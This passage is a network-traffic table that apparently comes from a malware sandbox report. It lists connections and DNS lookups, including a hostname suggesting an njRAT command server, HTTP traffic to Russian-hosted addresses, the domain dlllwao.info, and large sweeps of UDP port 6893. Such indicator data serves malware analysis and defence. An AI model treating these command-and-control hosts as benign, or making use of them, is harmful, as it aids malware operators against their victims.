| FR | 87.98.179.200:6893 | udp | |
| FR | 87.98.179.201:6893 | udp | |
| FR | 87.98.179.202:6893 | udp | |
| FR | 87.98.179.203:6893 | udp | |
| FR | 87.98.179.204:6893 | udp | |
| FR | 87.98.179.205:6893 | udp | |
| FR | 87.98.179.206:6893 | udp | |
| FR | 87.98.179.207:6893 | udp | |
| FR | 87.98.179.208:6893 | udp | |
| FR | 87.98.179.209:6893 | udp | |
| FR | 87.98.179.210:6893 | udp | |
| FR | 87.98.179.211:6893 | udp | |
| FR | 87.98.179.212:6893 | udp | |
| FR | 87.98.179.213:6893 | udp | |
| FR | 87.98.179.214:6893 | udp | |
| FR | 87.98.179.215:6893 | udp | |
| FR | 87.98.179.216:6893 | udp | |
| FR | 87.98.179.217:6893 | udp | |
| FR | 87.98.179.218:6893 | udp | |
| FR | 87.98.179.219:6893 | udp | |
| FR | 87.98.179.220:6893 | udp | |
| FR | 87.98.179.221:6893 | udp | |
| FR | 87.98.179.222:6893 | udp | |
| FR | 87.98.179.223:6893 | udp | |
| FR | 87.98.179.224:6893 | udp | |
| FR | 87.98.179.225:6893 | udp | |
| FR | 87.98.179.226:6893 | udp | |
| FR | 87.98.179.227:6893 | udp | |
| FR | 87.98.179.228:6893 | udp | |
| FR | 87.98.179.229:6893 | udp | |
| FR | 87.98.179.230:6893 | udp | |
| FR | 87.98.179.231:6893 | udp | |
| FR | 87.98.179.232:6893 | udp | |
| FR | 87.98.179.233:6893 | udp | |
| FR | 87.98.179.234:6893 | udp | |
| FR | 87.98.179.235:6893 | udp | |
| FR | 87.98.179.236:6893 | udp | |
| FR | 87.98.179.237:6893 | udp | |
| FR | 87.98.179.238:6893 | udp | |
| FR | 87.98.179.239:6893 | udp | |
| FR | 87.98.179.240:6893 | udp | |
| FR | 87.98.179.241:6893 | udp | |
| FR | 87.98.179.242:6893 | udp | |
| FR | 87.98.179.243:6893 | udp | |
| FR | 87.98.179.244:6893 | udp | |
| FR | 87.98.179.245:6893 | udp | |
| FR | 87.98.179.246:6893 | udp | |
| FR | 87.98.179.247:6893 | udp | |
| FR | 87.98.179.248:6893 | udp | |
| FR | 87.98.179.249:6893 | udp | |
| FR | 87.98.179.250:6893 | udp | |
| FR | 87.98.179.251:6893 | udp | |
| FR | 87.98.179.252:6893 | udp | |
| FR | 87.98.179.253:6893 | udp | |
| FR | 87.98.179.254:6893 | udp | |
| RU | 92.63.107.12:80 | tcp | |
| RU | 91.218.114.31:80 | tcp | |
| RU | 91.218.114.31:80 | tcp | |
| RU | 91.218.114.32:80 | tcp | |
| SE | 40.126.53.21:443 | tcp | |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| RU | 91.218.114.31:80 | tcp | |
| US | 8.8.8.8:53 | DanilWhiteNjrat-57320.portmap.host | udp |
| RU | 91.218.114.32:80 | tcp | |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| RU | 91.218.114.37:80 | 91.218.114.37 | tcp |
| RU | 91.218.114.38:80 | tcp | |
| RU | 91.218.114.32:80 | tcp | |
| RU | 91.218.114.32:80 | tcp | |
| US | 8.8.8.8:53 | DanilWhiteNjrat-57320.portmap.host | udp |
| RU | 91.218.114.38:80 | tcp | |
| RU | 91.218.114.38:80 | tcp | |
| RU | 91.218.114.4:80 | tcp | |
| RU | 91.218.114.38:80 | tcp | |
| RU | 91.218.114.26:80 | tcp | |
| RU | 91.218.114.77:80 | tcp | |
| US | 8.8.8.8:53 | DanilWhiteNjrat-57320.portmap.host | udp |
| US | 104.16.154.36:80 | tcp | |
| US | 8.8.8.8:53 | DanilWhiteNjrat-57320.portmap.host | udp |
| RU | 91.218.114.77:80 | tcp | |
| RU | 91.218.114.77:80 | tcp | |
| US | 8.8.8.8:53 | DanilWhiteNjrat-57320.portmap.host | udp |
| N/A | 127.0.0.1:49955 | tcp | |
| RU | 91.218.114.77:80 | tcp | |
| LT | 91.211.247.248:53 | dlllwao.info | udp |
| RU | 91.218.114.79:80 | tcp | |
| US | 185.196.8.22:80 | dlllwao.info | tcp |
| US | 8.8.8.8:53 | 248.247.211.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.8.196.185.in-addr.arpa | udp |
| US | 192.229.221.95:80 | tcp | |
| RU | 91.218.114.11:80 | tcp | |
| US | 104.16.154.36:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 93.107.12.0:6893 | udp | |
| N/A | 93.107.12.1:6893 | udp | |
| N/A | 93.107.12.2:6893 | udp | |
| N/A | 93.107.12.3:6893 | udp | |
| N/A | 93.107.12.4:6893 | udp | |
| N/A | 93.107.12.5:6893 | udp | |
| N/A | 93.107.12.6:6893 | udp | |
| N/A | 93.107.12.7:6893 | udp | |
| N/A | 93.107.12.8:6893 | udp | |
| N/A | 93.107.12.9:6893 | udp | |
| N/A | 93.107.12.10:6893 | udp | |
| N/A | 93.107.12.11:6893 | udp | |
| N/A | 93.107.12.12:6893 | udp | |
| N/A | 93.107.12.13:6893 | udp | |
| N/A | 93.107.12.14:6893 | udp | |
| N/A | 93.107.12.15:6893 | udp | |
| N/A | 93.107.12.16:6893 | udp | |
| N/A | 93.107.12.17:6893 | udp | |
| N/A | 93.107.12.18:6893 | udp | |
| N/A | 93.107.12.19:6893 | udp | |
| N/A | 93.107.12.20:6893 | udp | |
| N/A | 93.107.12.21:6893 | udp | |
| N/A | 93.107.12.22:6893 | udp | |
| N/A | 93.107.12.23:6893 | udp | |
| N/A | 93.107.12.24:6893 | udp | |
| N/A | 93.107.12.25:6893 | udp | |
| N/A | 93.107.12.26:6893 | udp | |
| N/A | 93.107.12.27:6893 | udp | |
| N/A | 93.107.12.28:6893 | udp | |
| N/A | 93.107.12.29:6893 | udp | |
| N/A | 93.107.12.30:6893 | udp | |
| N/A | 93.107.12.31:6893 | udp | |
| N/A | 95.1.200.0:6893 | udp | |
| N/A | 95.1.200.1:6893 | udp | |
| N/A | 95.1.200.2:6893 | udp | |
| N/A | 95.1.200.3:6893 | udp | |
| N/A | 95.1.200.4:6893 | udp | |
| N/A | 95.1.200.5:6893 | udp | |
| N/A | 95.1.200.6:6893 | udp | |
| N/A | 95.1.200.7:6893 | udp | |
| N/A | 95.1.200.8:6893 | udp | |
| N/A | 95.1.200.9:6893 | udp | |
| N/A | 95.1.200.10:6893 | udp | |
| N/A | 95.1.200.11:6893 | udp | |
| N/A | 95.1.200.12:6893 | udp | |
| N/A | 95.1.200.13:6893 | udp | |
| N/A | 95.1.200.14:6893 | udp | |
| N/A | 95.1.200.15:6893 | udp | |
| N/A | 95.1.200.16:6893 | udp | |
| N/A | 95.1.200.17:6893 | udp | |
| N/A | 95.1.200.18:6893 | udp | |
| N/A | 95.1.200.19:6893 | udp | |
| N/A | 95.1.200.20:6893 | udp | |
| N/A | 95.1.200.21:6893 | udp | |
| N/A | 95.1.200.22:6893 | udp | |
| N/A | 95.1.200.23:6893 | udp | |
| N/A | 95.1.200.24:6893 | udp | |
| N/A | 95.1.200.25:6893 | udp | |
| N/A | 95.1.200.26:6893 | udp | |
| N/A | 95.1.200.27:6893 | udp | |
| N/A | 95.1.200.28:6893 | udp | |
| N/A | 95.1.200.29:6893 | udp | |
| N/A | 95.1.200.30:6893 | udp | |
| N/A | 95.1.200.31:6893 | udp | |
| N/A | 87.98.176.0:6893 | udp | |
| N/A | 87.98.176.1:6893 | udp | |
| N/A | 87.98.176.2:6893 | udp | |
| N/A | 87.98.176.3:6893 | udp | |
| N/A | 87.98.176.4:6893 | udp | |
| N/A | 87.98.176.5:6893 | udp | |
| N/A | 87.98.176.6:6893 | udp | |
| N/A | 87.98.176.7:6893 | udp | |
| N/A | 87.98.176.8:6893 | udp | |
| N/A | 87.98.176.9:6893 | udp | |
| N/A | 87.98.176.10:6893 | udp | |
| N/A | 87.98.176.11:6893 | udp | |
| N/A | 87.98.176.12:6893 | udp | |
| N/A | 87.98.176.13:6893 | udp | |
| N/A | 87.98.176.14:6893 | udp | |
| N/A | 87.98.176.15:6893 | udp | |
| N/A | 87.98.176.16:6893 | udp | |
| N/A | 87.98.176.17:6893 | udp | |
| N/A | 87.98.176.18:6893 | udp | |
| N/A | 87.98.176.19:6893 | udp | |
| N/A | 87.98.176.20:6893 | udp | |
| N/A | 87.98.176.21:6893 | udp | |
| N/A | 87.98.176.22:6893 | udp | |
| N/A | 87.98.176.23:6893 | udp | |
| N/A | 87.98.176.24:6893 | udp | |
| N/A | 87.98.176.25:6893 | udp | |
| N/A | 87.98.176.26:6893 | udp | |
| N/A | 87.98.176.27:6893 | udp | |
| N/A | 87.98.176.28:6893 | udp | |
| N/A | 87.98.176.29:6893 | udp | |
| N/A | 87.98.176.30:6893 | udp | |
| N/A | 87.98.176.31:6893 | udp | |
| N/A | 87.98.176.32:6893 | udp | |
| N/A | 87.98.176.33:6893 | udp | |
| N/A | 87.98.176.34:6893 | udp | |
| N/A | 87.98.176.35:6893 | udp | |
| N/A | 87.98.176.36:6893 | udp | |
| N/A | 87.98.176.37:6893 | udp | |
| N/A | 87.98.176.38:6893 | udp | |
| N/A | 87.98.176.39:6893 | udp | |
| N/A | 87.98.176.40:6893 | udp | |
| N/A | 87.98.176.41:6893 | udp | |
| N/A | 87.98.176.42:6893 | udp | |
| N/A | 87.98.176.43:6893 | udp | |
| N/A | 87.98.176.44:6893 | udp | |
| N/A | 87.98.176.45:6893 | udp | |
| N/A | 87.98.176.46:6893 | udp | |
| N/A | 87.98.176.47:6893 | udp | |
| N/A | 87.98.176.48:6893 | udp | |
| N/A | 87.98.176.49:6893 | udp | |
| N/A | 87.98.176.50:6893 | udp | |
| N/A | 87.98.176.51:6893 | udp | |
| N/A | 87.98.176.52:6893 | udp | |
| N/A | 87.98.176.53:6893 | udp | |
| N/A | 87.98.176.54:6893 | udp | |
| N/A | 87.98.176.55:6893 | udp | |
| N/A | 87.98.176.56:6893 | udp | |
| N/A | 87.98.176.57:6893 | udp | |
| N/A | 87.98.176.58:6893 | udp | |
| N/A | 87.98.176.59:6893 | udp | |
| N/A | 87.98.176.60:6893 | udp | |
| N/A | 87.98.176.61:6893 | udp | |
| N/A | 87.98.176.62:6893 | udp | |
| N/A | 87.98.176.63:6893 | udp | |
| N/A | 87.98.176.64:6893 | udp | |
| N/A | 87.98.176.65:6893 | udp | |
| N/A | 87.98.176.66:6893 | udp | |
| N/A | 87.98.176.67:6893 | udp | |
| N/A | 87.98.176.68:6893 | udp | |
| N/A | 87.98.176.69:6893 | udp | |
| N/A | 87.98.176.70:6893 | udp | |
| N/A | 87.98.176.71:6893 | udp | |
| N/A | 87.98.176.72:6893 | udp | |
| N/A | 87.98.176.73:6893 | udp | |
| N/A | 87.98.176.74:6893 | udp | |
| N/A | 87.98.176.75:6893 | udp | |
| N/A | 87.98.176.76:6893 | udp | |
| N/A | 87.98.176.77:6893 | udp | |
| N/A | 87.98.176.78:6893 | udp | |
| N/A | 87.98.176.79:6893 | udp | |
| N/A | 87.98.176.80:6893 | udp | |
| N/A | 87.98.176.81:6893 | udp | |
| N/A | 87.98.176.82:6893 | udp | |
| N/A | 87.98.176.83:6893 | udp | |
| N/A | 87.98.176.84:6893 | udp | |
| N/A | 87.98.176.85:6893 | udp | |
| N/A | 87.98.176.86:6893 | udp | |
| N/A | 87.98.176.87:6893 | udp | |
| N/A | 87.98.176.88:6893 | udp | |
| N/A | 87.98.176.89:6893 | udp | |
| N/A | 87.98.176.90:6893 | udp | |
| N/A | 87.98.176.91:6893 | udp | |
| N/A | 87.98.176.92:6893 | udp | |
| N/A | 87.98.176.93:6893 | udp | |
| N/A | 87.98.176.94:6893 | udp | |
| N/A | 87.98.176.95:6893 | udp | |
| N/A | 87.98.176.96:6893 | udp | |
| N/A | 87.98.176.97:6893 | udp | |
| N/A | 87.98.176.98:6893 | udp | |
| N/A | 87.98.176.99:6893 | udp | |
| N/A | 87.98.176.100:6893 | udp | |
| N/A | 87.98.176.101:6893 | udp | |
| N/A | 87.98.176.102:6893 | udp | |
| N/A | 87.98.176.103:6893 | udp | |
| N/A | 87.98.176.104:6893 | udp | |
| N/A | 87.98.176.105:6893 | udp | |
| N/A | 87.98.176.106:6893 | udp | |
| N/A | 87.98.176.107:6893 | udp | |
| N/A | 87.98.176.108:6893 | udp | |
| N/A | 87.98.176.109:6893 | udp | |
| N/A | 87.98.176.110:6893 | udp | |
| N/A | 87.98.176.111:6893 | udp | |
| N/A | 87.98.176.112:6893 | udp | |
| N/A | 87.98.176.113:6893 | udp | |
| N/A | 87.98.176.114:6893 | udp | |
| N/A | 87.98.176.115:6893 | udp | |
| N/A | 87.98.176.116:6893 | udp | |
| N/A | 87.98.176.117:6893 | udp | |
| N/A | 87.98.176.118:6893 | udp | |
| N/A | 87.98.176.119:6893 | udp | |
| N/A | 87.98.176.120:6893 | udp | |
| N/A | 87.98.176.121:6893 | udp | |
| N/A | 87.98.176.122:6893 | udp | |
| N/A | 87.98.176.123:6893 | udp | |
| N/A | 87.98.176.124:6893 | udp | |
| N/A | 87.98.176.125:6893 | udp | |
| N/A | 87.98.176.126:6893 | udp | |
| N/A | 87.98.176.127:6893 | udp | |
| N/A | 87.98.176.128:6893 | udp | |
| N/A | 87.98.176.129:6893 | udp | |
| N/A | 87.98.176.130:6893 | udp | |
| N/A | 87.98.176.131:6893 | udp | |
| N/A | 87.98.176.132:6893 | udp | |
| N/A | 87.98.176.133:6893 | udp | |
| N/A | 87.98.176.134:6893 | udp | |
| N/A | 87.98.176.135:6893 | udp | |
| N/A | 87.98.176.136:6893 | udp | |
| N/A | 87.98.176.137:6893 | udp | |
| N/A | 87.98.176.138:6893 | udp | |
| N/A | 87.98.176.139:6893 | udp | |
| N/A | 87.98.176.140:6893 | udp | |
| N/A | 87.98.176.141:6893 | udp | |
| N/A | 87.98.176.142:6893 | udp | |
| N/A | 87.98.176.143:6893 | udp | |
| N/A | 87.98.176.144:6893 | udp | |
| N/A | 87.98.176.145:6893 | udp | |
| N/A | 87.98.176.146:6893 | udp | |
| N/A | 87.98.176.147:6893 | udp | |
| N/A | 87.98.176.148:6893 | udp | |
| N/A | 87.98.176.149:6893 | udp | |
| N/A | 87.98.176.150:6893 | udp | |
| N/A | 87.98.176.151:6893 | udp | |
| N/A | 87.98.176.152:6893 | udp | |
| N/A | 87.98.176.153:6893 | udp | |
| N/A | 87.98.176.154:6893 | udp | |
| N/A | 87.98.176.155:6893 | udp | |
| N/A | 87.98.176.156:6893 | udp | |
| N/A | 87.98.176.157:6893 | udp | |
| N/A | 87.98.176.158:6893 | udp | |
| N/A | 87.98.176.159:6893 | udp | |
| N/A | 87.98.176.160:6893 | udp | |
| N/A | 87.98.176.161:6893 | udp | |
| N/A | 87.98.176.162:6893 | udp | |
| N/A | 87.98.176.163:6893 | udp | |
| N/A | 87.98.176.164:6893 | udp | |
| N/A | 87.98.176.165:6893 | udp | |
| N/A | 87.98.176.166:6893 | udp | |
| N/A | 87.98.176.167:6893 | udp | |
| N/A | 87.98.176.168:6893 | udp | |
| N/A | 87.98.176.169:6893 | udp | |
| N/A | 87.98.176.170:6893 | udp | |
| N/A | 87.98.176.171:6893 | udp | |
| N/A | 87.98.176.172:6893 | udp | |
| N/A | 87.98.176.173:6893 | udp | |
| N/A | 87.98.176.174:6893 | udp | |
| N/A | 87.98.176.175:6893 | udp | |
| N/A | 87.98.176.176:6893 | udp | |
| N/A | 87.98.176.177:6893 | udp | |
| N/A | 87.98.176.178:6893 | udp | |
| N/A | 87.98.176.179:6893 | udp | |
| N/A | 87.98.176.180:6893 | udp | |
| N/A | 87.98.176.181:6893 | udp | |
| N/A | 87.98.176.182:6893 | udp | |
| N/A | 87.98.176.183:6893 | udp | |
| N/A | 87.98.176.184:6893 | udp | |
| N/A | 87.98.176.185:6893 | udp | |
| N/A | 87.98.176.186:6893 | udp | |
| N/A | 87.98.176.187:6893 | udp | |
| N/A | 87.98.176.188:6893 | udp | |
| N/A | 87.98.176.189:6893 | udp | |
| N/A | 87.98.176.190:6893 | udp | |
| N/A | 87.98.176.191:6893 | udp | |
| N/A | 87.98.176.192:6893 | udp | |
| N/A | 87.98.176.193:6893 | udp | |
| N/A | 87.98.176.194:6893 | udp | |
| N/A | 87.98.176.195:6893 | udp | |
| N/A | 87.98.176.196:6893 | udp | |
| N/A | 87.98.176.197:6893 | udp | |
| N/A | 87.98.176.198:6893 | udp | |
| N/A | 87.98.176.199:6893 | udp | |
| N/A | 87.98.176.200:6893 | udp | |
| N/A | 87.98.176.201:6893 | udp | |
| N/A | 87.98.176.202:6893 | udp | |
| N/A | 87.98.176.203:6893 | udp | |
| N/A | 87.98.176.204:6893 | udp | |
| N/A | 87.98.176.205:6893 | udp | |
| N/A | 87.98.176.206:6893 | udp | |
| N/A | 87.98.176.207:6893 | udp | |
| N/A | 87.98.176.208:6893 | udp | |
| N/A | 87.98.176.209:6893 | udp | |
| N/A | 87.98.176.210:6893 | udp | |
| N/A | 87.98.176.211:6893 | udp | |
| N/A | 87.98.176.212:6893 | udp | |
| N/A | 87.98.176.213:6893 | udp | |
| N/A | 87.98.176.214:6893 | udp | |
| N/A | 87.98.176.215:6893 | udp | |
| N/A | 87.98.176.216:6893 | udp | |
| N/A | 87.98.176.217:6893 | udp | |
| N/A | 87.98.176.218:6893 | udp | |
| N/A | 87.98.176.219:6893 | udp | |
| N/A | 87.98.176.220:6893 | udp | |
| N/A | 87.98.176.221:6893 | udp | |
| N/A | 87.98.176.222:6893 | udp | |
| N/A | 87.98.176.223:6893 | udp | |
| N/A | 87.98.176.224:6893 | udp | |
| N/A | 87.98.176.225:6893 | udp | |
| N/A | 87.98.176.226:6893 | udp | |
| N/A | 87.98.176.227:6893 | udp | |
| N/A | 87.98.176.228:6893 | udp | |
| N/A | 87.98.176.229:6893 | udp | |
| N/A | 87.98.176.230:6893 | udp | |
| N/A | 87.98.176.231:6893 | udp | |
| N/A | 87.98.176.232:6893 | udp | |
| N/A | 87.98.176.233:6893 | udp | |
| N/A | 87.98.176.234:6893 | udp | |
| N/A | 87.98.176.235:6893 | udp | |
| N/A | 87.98.176.236:6893 | udp | |
| N/A | 87.98.176.237:6893 | udp | |
| N/A | 87.98.176.238:6893 | udp | |
| N/A | 87.98.176.239:6893 | udp | |
| N/A | 87.98.176.240:6893 | udp | |
| N/A | 87.98.176.241:6893 | udp | |
| N/A | 87.98.176.242:6893 | udp | |
| N/A | 87.98.176.243:6893 | udp | |
| N/A | 87.98.176.244:6893 | udp | |
| N/A | 87.98.176.245:6893 | udp | |
| N/A | 87.98.176.246:6893 | udp | |
| N/A | 87.98.176.247:6893 | udp | |
| N/A | 87.98.176.248:6893 | udp | |
| N/A | 87.98.176.249:6893 | udp | |
| N/A | 87.98.176.250:6893 | udp | |
| N/A | 87.98.176.251:6893 | udp | |
| N/A | 87.98.176.252:6893 | udp | |
| N/A | 87.98.176.253:6893 | udp | |
| N/A | 87.98.176.254:6893 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 87.98.176.255:6893 | udp | |
| N/A | 87.98.177.0:6893 | udp | |
| N/A | 87.98.177.1:6893 | udp | |
| N/A | 87.98.177.2:6893 | udp | |
| N/A | 87.98.177.3:6893 | udp | |
| N/A | 87.98.177.4:6893 | udp | |
| N/A | 87.98.177.5:6893 | udp | |
| N/A | 87.98.177.6:6893 | udp | |
| N/A | 87.98.177.7:6893 | udp | |
| N/A | 87.98.177.8:6893 | udp | |
| N/A | 87.98.177.9:6893 | udp | |
| N/A | 87.98.177.10:6893 | udp | |
| N/A | 87.98.177.11:6893 | udp | |
| N/A | 87.98.177.12:6893 | udp | |
| N/A | 87.98.177.13:6893 | udp | |
| N/A | 87.98.177.14:6893 | udp | |
| N/A | 87.98.177.15:6893 | udp | |
| N/A | 87.98.177.16:6893 | udp | |
| N/A | 87.98.177.17:6893 | udp | |
| N/A | 87.98.177.18:6893 | udp | |
| N/A | 87.98.177.19:6893 | udp | |
| N/A | 87.98.177.20:6893 | udp | |
| N/A | 87.98.177.21:6893 | udp | |
| N/A | 87.98.177.22:6893 | udp | |
| N/A | 87.98.177.23:6893 | udp | |
| N/A | 87.98.177.24:6893 | udp | |
| N/A | 87.98.177.25:6893 | udp | |
| N/A | 87.98.177.26:6893 | udp | |
| N/A | 87.98.177.27:6893 | udp | |
| N/A | 87.98.177.28:6893 | udp | |
| N/A | 87.98.177.29:6893 | udp | |
| N/A | 87.98.177.30:6893 | udp | |
| N/A | 87.98.177.31:6893 | udp | |
| N/A | 87.98.177.32:6893 | udp | |
| N/A | 87.98.177.33:6893 | udp | |
| N/A | 87.98.177.34:6893 | udp | |
| N/A | 87.98.177.35:6893 | udp | |
| N/A | 87.98.177.36:6893 | udp | |
| N/A | 87.98.177.37:6893 | udp | |
| N/A | 87.98.177.38:6893 | udp | |
| N/A | 87.98.177.39:6893 | udp | |
| N/A | 87.98.177.40:6893 | udp | |
| N/A | 87.98.177.41:6893 | udp | |
| N/A | 87.98.177.42:6893 | udp | |
| N/A | 87.98.177.43:6893 | udp | |
| N/A | 87.98.177.44:6893 | udp | |
| N/A | 87.98.177.45:6893 | udp | |
| N/A | 87.98.177.46:6893 | udp | |
| N/A | 87.98.177.47:6893 | udp | |
| N/A | 87.98.177.48:6893 | udp | |
| N/A | 87.98.177.49:6893 | udp | |
| N/A | 87.98.177.50:6893 | udp | |
| N/A | 87.98.177.51:6893 | udp | |
| N/A | 87.98.177.52:6893 | udp | |
| N/A | 87.98.177.53:6893 | udp | |
| N/A | 87.98.177.54:6893 | udp | |
| N/A | 87.98.177.55:6893 | udp | |
| N/A | 87.98.177.56:6893 | udp | |
| N/A | 87.98.177.57:6893 | udp | |
| N/A | 87.98.177.58:6893 | udp | |
| N/A | 87.98.177.59:6893 | udp | |
| N/A | 87.98.177.60:6893 | udp | |
| N/A | 87.98.177.61:6893 | udp | |
| N/A | 87.98.177.62:6893 | udp | |
| N/A | 87.98.177.63:6893 | udp | |
| N/A | 87.98.177.64:6893 | udp | |
| N/A | 87.98.177.65:6893 | udp | |
| N/A | 87.98.177.66:6893 | udp | |
| N/A | 87.98.177.67:6893 | udp | |
| N/A | 87.98.177.68:6893 | udp | |
| N/A | 87.98.177.69:6893 | udp | |
| N/A | 87.98.177.70:6893 | udp | |
| N/A | 87.98.177.71:6893 | udp | |
| N/A | 87.98.177.72:6893 | udp | |
| N/A | 87.98.177.73:6893 | udp | |
| N/A | 87.98.177.74:6893 | udp | |
| N/A | 87.98.177.75:6893 | udp | |
| N/A | 87.98.177.76:6893 | udp | |
| N/A | 87.98.177.77:6893 | udp | |
| N/A | 87.98.177.78:6893 | udp | |
| N/A | 87.98.177.79:6893 | udp | |
| N/A | 87.98.177.80:6893 | udp | |
| N/A | 87.98.177.81:6893 | udp | |
| N/A | 87.98.177.82:6893 | udp | |
| N/A | 87.98.177.83:6893 | udp | |
| N/A | 87.98.177.84:6893 | udp | |
| N/A | 87.98.177.85:6893 | udp | |
| N/A | 87.98.177.86:6893 | udp | |
| N/A | 87.98.177.87:6893 | udp | |
| N/A | 87.98.177.88:6893 | udp | |
| N/A | 87.98.177.89:6893 | udp | |
| N/A | 87.98.177.90:6893 | udp | |
| N/A | 87.98.177.91:6893 | udp | |
| N/A | 87.98.177.92:6893 | udp | |
| N/A | 87.98.177.93:6893 | udp | |
| N/A | 87.98.177.94:6893 | udp | |
| N/A | 87.98.177.95:6893 | udp | |
| N/A | 87.98.177.96:6893 | udp | |
| N/A | 87.98.177.97:6893 | udp | |
| N/A | 87.98.177.98:6893 | udp | |
| N/A | 87.98.177.99:6893 | udp | |
| N/A | 87.98.177.100:6893 | udp | |
| N/A | 87.98.177.101:6893 | udp | |
| N/A | 87.98.177.102:6893 | udp | |
| N/A | 87.98.177.103:6893 | udp | |
| N/A | 87.98.177.104:6893 | udp | |
| N/A | 87.98.177.105:6893 | udp | |
| N/A | 87.98.177.106:6893 | udp | |
| N/A | 87.98.177.107:6893 | udp | |
| N/A | 87.98.177.108:6893 | udp | |
| N/A | 87.98.177.109:6893 | udp | |
| N/A | 87.98.177.110:6893 | udp | |
| N/A | 87.98.177.111:6893 | udp | |
| N/A | 87.98.177.112:6893 | udp | |
| N/A | 87.98.177.113:6893 | udp | |
| N/A | 87.98.177.114:6893 | udp | |
| N/A | 87.98.177.115:6893 | udp | |
| N/A | 87.98.177.116:6893 | udp | |
| N/A | 87.98.177.117:6893 | udp | |
| N/A | 87.98.177.118:6893 | udp | |
| N/A | 87.98.177.119:6893 | udp | |
| N/A | 87.98.177.120:6893 | udp | |
| N/A | 87.98.177.121:6893 | udp | |
| N/A | 87.98.177.122:6893 | udp | |
| N/A | 87.98.177.123:6893 | udp | |
| N/A | 87.98.177.124:6893 | udp | |
| N/A | 87.98.177.125:6893 | udp | |
| N/A | 87.98.177.126:6893 | udp | |
| N/A | 87.98.177.127:6893 | udp | |
| N/A | 87.98.177.128:6893 | udp | |
| N/A | 87.98.177.129:6893 | udp | |
| N/A | 87.98.177.130:6893 | udp | |
| N/A | 87.98.177.131:6893 | udp | |
| N/A | 87.98.177.132:6893 | udp | |
| N/A | 87.98.177.133:6893 | udp | |
| N/A | 87.98.177.134:6893 | udp | |
| N/A | 87.98.177.135:6893 | udp | |
| N/A | 87.98.177.136:6893 | udp | |
| N/A | 87.98.177.137:6893 | udp | |
| N/A | 87.98.177.138:6893 | udp | |
| N/A | 87.98.177.139:6893 | udp | |
| N/A | 87.98.177.140:6893 | udp | |
| N/A | 87.98.177.141:6893 | udp | |
| N/A | 87.98.177.142:6893 | udp | |
| N/A | 87.98.177.143:6893 | udp | |
| N/A | 87.98.177.144:6893 | udp | |
| N/A | 87.98.177.145:6893 | udp | |
| N/A | 87.98.177.146:6893 | udp | |
| N/A | 87.98.177.147:6893 | udp | |
| N/A | 87.98.177.148:6893 | udp | |
| N/A | 87.98.177.149:6893 | udp | |
| N/A | 87.98.177.150:6893 | udp | |
| N/A | 87.98.177.151:6893 | udp | |
| N/A | 87.98.177.152:6893 | udp | |
| N/A | 87.98.177.153:6893 | udp | |
| N/A | 87.98.177.154:6893 | udp | |
| N/A | 87.98.177.155:6893 | udp | |
| N/A | 87.98.177.156:6893 | udp | |
| N/A | 87.98.177.157:6893 | udp | |
| N/A | 87.98.177.158:6893 | udp | |
| N/A | 87.98.177.159:6893 | udp | |
| N/A | 87.98.177.160:6893 | udp | |
| N/A | 87.98.177.161:6893 | udp | |
| N/A | 87.98.177.162:6893 | udp | |
| N/A | 87.98.177.163:6893 | udp | |
| N/A | 87.98.177.164:6893 | udp | |
| N/A | 87.98.177.165:6893 | udp | |
| N/A | 87.98.177.166:6893 | udp | |
| N/A | 87.98.177.167:6893 | udp | |
| N/A | 87.98.177.168:6893 | udp | |
| N/A | 87.98.177.169:6893 | udp | |
| N/A | 87.98.177.170:6893 | udp | |
| N/A | 87.98.177.171:6893 | udp | |
| N/A | 87.98.177.172:6893 | udp | |
| N/A | 87.98.177.173:6893 | udp | |
| N/A | 87.98.177.174:6893 | udp | |
| N/A | 87.98.177.175:6893 | udp | |
| N/A | 87.98.177.176:6893 | udp | |
| N/A | 87.98.177.177:6893 | udp | |
| N/A | 87.98.177.178:6893 | udp | |
| N/A | 87.98.177.179:6893 | udp | |
| N/A | 87.98.177.180:6893 | udp | |
| N/A | 87.98.177.181:6893 | udp | |
| N/A | 87.98.177.182:6893 | udp | |
| N/A | 87.98.177.183:6893 | udp | |
| N/A | 87.98.177.184:6893 | udp | |
| N/A | 87.98.177.185:6893 | udp | |
| N/A | 87.98.177.186:6893 | udp | |
